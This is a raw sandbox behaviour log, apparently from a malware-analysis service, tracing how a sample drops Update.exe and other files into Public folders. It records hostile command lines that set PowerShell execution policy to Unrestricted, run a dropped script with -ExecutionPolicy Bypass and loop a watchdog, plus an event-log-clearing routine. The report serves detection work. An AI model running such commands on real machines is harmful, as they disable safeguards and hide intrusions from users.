                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: ErbgterT2R.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile read: C:\Users\user\Desktop\ErbgterT2R.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\ErbgterT2R.exe "C:\Users\user\Desktop\ErbgterT2R.exe"
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ErbgterT2R.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: update.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: vcruntime140.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: wldp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: propsys.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: profapi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: linkinfo.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: ntshrui.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: sspicli.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: srvcli.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: cscapi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: ntmarta.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: mswsock.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: winmm.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: napinsp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: wshbth.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: nlaapi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: dnsapi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: winrnr.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: dxgi.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: dinput8.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: inputhost.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: coremessaging.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: wintypes.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: coremessaging.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: devenum.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: devobj.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: msasn1.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: msdmo.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: avicap32.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: msvfw32.dll
Source: C:\Users\Public\Bilite\Axialis\Update.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: 360inst_install.exe.lnk.3.dr LNK file: ..\..\Public\Bilite\360inst_install.exe
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: ErbgterT2R.exe Static file information: File size 73541183 > 1048576
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2639809888.000000000785C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb77 source: powershell.exe, 00000012.00000002.2646019166.000000000899B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2641443881.000000000790F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp, Update.dll.0.dr
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2645678800.000000000896C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2646365604.00000000089D1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360inst_install.exe.0.dr
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 0_2_00406D5D
                      Source: Update.dll.0.dr Static PE information: section name: .00cfg
                      Source: backup.dll.3.dr Static PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00411C20 push eax; ret 0_2_00411C4E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034F4345 push ecx; ret 3_2_034F4358
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0350A168 push eax; ret 3_2_0350A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0350A0B8 push eax; ret 3_2_0350A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_03502450 push ebp; retf 3_2_03502474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_03502470 push ebp; retf 3_2_03502474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_6C38CAF7 push ecx; ret 3_2_6C38CB0A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0091CAFF push eax; retf 3_2_0091CB00
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0091CB07 pushad ; retf 3_2_0091CB08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0091CB0B push 701000CBh; retf 3_2_0091CB10
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_0091CB61 pushfd ; retf 3_2_0091CB64
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_00919DCC push ecx; ret 3_2_00919DDF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_03053D04 push ecx; ret 3_2_03053D17
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_04B6C040 push edi; iretd 18_2_04B6C046
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_04B6D293 push ebx; ret 18_2_04B6D2BA
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe File created: C:\Users\user\AppData\Local\Temp\backup.exe
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe File created: C:\Users\Public\Bilite\360inst_install.exe
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe File created: C:\Users\Public\Bilite\Axialis\Update.dll
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe File created: C:\Users\Public\Bilite\Axialis\Update.exe
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe File created: C:\Users\user\AppData\Local\Temp\backup.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034EB3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 3_2_034EB3C0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
